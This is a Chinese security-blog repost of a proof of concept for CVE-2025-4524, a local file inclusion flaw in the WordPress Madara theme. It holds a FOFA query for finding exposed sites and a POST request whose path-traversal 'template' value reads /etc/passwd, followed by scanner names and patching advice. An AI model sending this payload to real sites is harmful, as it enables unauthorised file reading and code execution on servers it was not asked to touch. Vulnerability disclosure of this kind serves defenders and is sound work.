WordPress Madara 本地文件包含漏洞 (CVE-2025-4524) POC

2025年5月27日19:19:00评论0 views字数 568阅读1分53秒阅读模式

漏洞概述

适用于 WordPress 的漫画网站主题的 Madara – 响应式和现代 WordPress 主题在包括 2.2.2 在内的所有版本中都容易受到通过“template”参数包含本地文件的影响。这使得未经身份验证的攻击者可以在服务器上包含和执行任意文件，从而允许执行这些文件中的任何 PHP 代码。这可用于绕过访问控制、获取敏感数据，或在可以上传和包含图像和其他“安全”文件类型的情况下实现代码执行。

搜索引擎

FOFA:

body="/wp-content/plugins/madara/"

WordPress Madara 本地文件包含漏洞 (CVE-2025-4524) POC

漏洞复现

POC

POST /wp-admin/admin-afax.php HTTP/1.1


action=madara_load_more&page=1&template=plugins/../../../../../../../etc/passwd&vars%5Border%5D=meta_value_num&vars%5Bpaged%5D=1&vars%5Btimerange%5D=&……

自查工具

nuclei

afrog

xray

修复建议

1、关闭互联网暴露面或接口设置访问权限

2、更新到版本 2.2.2.1 或更新的修补版本

原文始发于微信公众号（Nday Poc）：WordPress Madara 本地文件包含漏洞 (CVE-2025-4524)

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

本文由 admin 发表于 2025年5月27日19:19:00
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
WordPress Madara 本地文件包含漏洞 (CVE-2025-4524) POChttp://cn-sec.com/archives/4102925.html
免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉.

WordPress Madara 本地文件包含漏洞 (CVE-2025-4524) POC

CVE-2025-24813：Apache Tomcat 漏洞POC

Zyxel-硬编码后门账户漏洞-CVE-2020-29583

Zyxel-USG-Series-账户硬编码漏洞（CVE-2020-29583）

用友U8cloud so.saleorder.briefing接口SQL注入漏洞 POC

福建科X讯通信有限公司指挥调度命令执行 send_fax.php

CVE-2025-0282：Ivanti缓冲区溢出漏洞

时空智友企业流程化管控系统 indexService.notice SQL注入漏洞

Commvault 远程代码执行漏洞(CVE-2025-34028)

金和OA文件任意文件上传漏洞

新华三Gr-5400ax缓冲区溢出漏洞

发表评论

在线咨询

微信